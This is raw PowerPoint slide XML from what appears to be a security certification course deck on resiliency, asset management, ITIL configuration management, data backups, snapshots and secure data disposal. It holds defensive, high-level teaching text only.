            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Consider whether the service or business needs could be better supported by advanced concepts:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microservices, serverless, and orchestration focus on workflow requirements rather than server administration.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Benefits and common usage scenarios for software-defined networks.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If using a CSP, create an SLA and security responsibility matrix to identify who will perform security-critical tasks. Ensure that reporting and monitoring of cloud security data is integrated with on-premises monitoring and incident response.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Evaluate the security features of embedded devices and isolate them from other network devices.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Implement zero trust architecture concepts to validate connections and devices instead of relying on “inside” and “outside” boundary concepts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" sz="3200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="349146718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D2A31-DA82-747E-8E7C-134FF123EE8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson 7 - Explain Resiliency and Site Security Concepts</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7094CDBD-892C-9FFF-48CA-6DFA516E1005}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249486"/>
            <a:ext cx="10269538" cy="4398963"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Together, these concepts support cybersecurity operations, help protect against a wide range of problems, and ensure the continuity of operations in the face of disruptive events.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Lesson Objectives</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this lesson, you will do the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review important data backup concepts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand asset management practices.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Explore high availability and resilience strategies.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Review important physical security concepts.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38130872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E29D-4D79-36BE-0840-35492A8DF025}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="0"/>
            <a:ext cx="9905998" cy="965200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 7A - Asset Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE851B84-82CA-6A36-EF96-FF68ACEFE1EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="965200"/>
            <a:ext cx="9905999" cy="6223000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asset management is a critical component of effective cybersecurity operations. It involves identifying, classifying, and inventorying an organization’s IT assets, including hardware, software, data, and personnel. Effective asset management enables organizations to understand their IT infrastructure, monitor for unauthorized activity, and identify potential vulnerabilities. Asset management is essential for ensuring that all devices and systems are appropriately secured, patched, and updated to mitigate the risks of cyberattacks. Additionally, asset management supports incident response activities, enabling security teams to quickly identify and isolate affected assets during a security incident. By integrating asset management into cybersecurity operations, organizations can strengthen their security posture and better protect their valuable assets against cyber threats.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asset Tracking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Asset Assignment/Accounting and Monitoring/Asset Tracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are several ways to perform asset enumeration, depending on the size and complexity of the organization and the types of assets involved:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Manual Inventory</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Network Scanning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Asset Management Software</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Configuration Management Database (CMDB)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Mobile Device Management (MDM) Solutions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud Asset Discovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Asset Acquisition/Procurement</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="111731359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8797B-A439-F935-6875-8B2D559EC9C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="0"/>
            <a:ext cx="9905998" cy="787400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Asset Protection Concepts</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE80D8AB-B09C-8265-B352-840CE1D52DAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="698500"/>
            <a:ext cx="9905999" cy="6337300"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From the perspective of cybersecurity operations, assets describe the critical resources, information, and infrastructure components that must be protected from potential threats and unauthorized access. The term “asset” encompasses resources such as hardware devices, software applications, data repositories, network components, and more. Asset protection is critical to maintaining an organization’s information system’s integrity, confidentiality, and availability.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Asset Identification and Standard Naming Conventions</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>ITIL® is a popular documentation framework of good and best practice activities and processes for delivering IT services. Under ITIL, configuration management is implemented using the following elements:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Service assets are things, processes, or people that contribute to delivering an IT service.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A Configuration Item (CI) is an asset that requires specific management procedures to be used to deliver the service. Each CI must be labeled, ideally</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>using a standard naming convention. CIs are defined by their attributes and relationships stored in a configuration management database (CMDB).</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A baseline configuration is a list of settings that an asset, such as a server or application, must adhere to. Security baselines describe the minimum set of security configuration settings a device or software must maintain to be considered adequately protected.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A configuration management system (CMS) describes the tools and databases used to collect, store, manage, update, and report information about CIs. A small network might capture this information in spreadsheets and diagrams, whereas a large organization may invest in dedicated applications designed for enterprise environments.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3501416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40854-893C-DB33-10FA-3400391F9C17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141413" y="139701"/>
            <a:ext cx="9905998" cy="1478570"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Data Backups</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2CEE9325-2E37-2B8F-CCA4-9B6BF6A07CCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1244600"/>
            <a:ext cx="9905999" cy="5473699"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Critical capabilities for enterprise backup solutions typically include the following features:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Support for various environments (virtual, physical, and cloud)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Data deduplication and compression to optimize storage space</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Instant recovery and replication for quick failover</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ransomware protection and encryption for data security</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Granular restore options for individual files, folders, or applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Reporting, monitoring, and alerting tools for effective management</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Integration with popular virtualization platforms, cloud providers, and</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>storage systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Backup Frequency</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>On-Site and Off-Site Backups</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Recovery Validation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36159598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306E-CA30-C443-3862-604A7583C9CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Advanced Data Protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{496A41C8-CC66-7AF1-DEB5-58F6C40FB490}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393700" y="2336872"/>
            <a:ext cx="5359400" cy="4394127"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Snapshots</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Snapshots play a vital role in data protection and recovery, capturing the state of a system at a specific point in time. Virtual Machine (VM), filesystem, and Storage Area Network (SAN) snapshots are three different types, each targeting a particular level of the storage hierarchy.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>VM snapshots</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Filesystem snapshots</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>,</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>SAN snapshots</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Replication and Journaling</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Encrypting Backups</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 501">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CAF60E0-0B34-3688-D1EF-821CD91CE68E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7069270" y="2336872"/>
            <a:ext cx="4513129" cy="4152828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="260394801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DB911-331C-7587-150D-5C185083076B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Secure Data Destruction</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F131E9AC-615F-E558-6C57-E1E442782E67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="393700" y="2336872"/>
            <a:ext cx="4984978" cy="4381427"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Additionally, when decommissioning storage devices or systems, destroy any stored data before disposal or repurposing to prevent unauthorized access to sensitive information.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Asset Disposal</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Asset disposal/decommissioning concepts focus on the secure and compliant handling of data and storage devices at the end of their lifecycle or when they are no longer needed. Some important concepts include the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Sanitization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Destruction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Certification</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Image 502">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{406D2F3C-330B-D5B1-2AAB-B2FCFDF1389F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5594350" y="2142034"/>
            <a:ext cx="6446372" cy="3962738"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="155086456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A6BC-E6E9-7763-6DB5-7E5B13B85FB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Asset Management</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
